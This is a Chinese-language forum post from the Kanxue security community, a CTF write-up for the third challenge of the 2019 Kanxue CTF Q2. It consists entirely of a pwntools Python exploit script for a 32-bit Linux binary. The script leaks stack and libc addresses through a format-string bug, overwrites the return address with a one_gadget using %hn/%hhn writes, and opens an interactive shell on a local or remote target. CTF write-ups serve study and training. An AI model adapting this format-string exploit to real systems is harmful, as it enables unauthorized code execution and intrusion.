[原创] 2019看雪CTFQ2第三题WP-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创] 2019看雪CTFQ2第三题WP

发表于: 2019-6-11 16:19 2748

[原创] 2019看雪CTFQ2第三题WP

pinohans

2019-6-11 16:19

2748

import sys
from pwn import *
 
###########
# args
###########
context.os          = 'linux'
context.arch        = 'i386'
context.log_level   = 'debug'
context.terminal    = ['tmux', 'splitw', '-h']
 
elf_file  = './format'
libc_file = './libc-2.23.so'
###########
 
elf     = ELF(elf_file)
libc    = ELF(libc_file)
rop     = ELF(libc_file)
 
 
def form(s):
    p.sendlineafter('Choice:', '1')
    p.sendlineafter('What do tou want to say:', s)
    return p.recvline()[:-1]
 
def run():
    esp = int(form(r'%5$x'), 16) + 0xffffd6e0 - 0xffffd7b4
    log.success('%s ===> %x' % ('esp', esp))
    log.success('%s ===> %x' % ('off', ((esp + 15 * 4) & 0xffff)))
    libc.address = int(form(r'%12$x'), 16) + 0xf75cd000 - 0xf777d000
    log.success('%s ===> %x' % ('libc.address', libc.address))
    one_gadget = libc.address + one
    log.success('%s ===> %x' % ('one_gadget', one_gadget))
    one_gadget = p32(one_gadget)
    for index, c in enumerate(one_gadget):
        form('%%%dc%%5$hn' % ((esp + 15 * 4 + index) & 0xffff))
        form('%%%dc%%53$hhn' % (ord(c)))
    p.interactive()
 
if __name__ == '__main__':
    if len(sys.argv) > 1:
        p = remote(sys.argv[1], int(sys.argv[2]))
        one = 0x5f065
    else:
        p = process(elf_file, env={'LD_PRELOAD': libc_file})
        gdb.attach(p)
        one = 0x5f065
 
    run()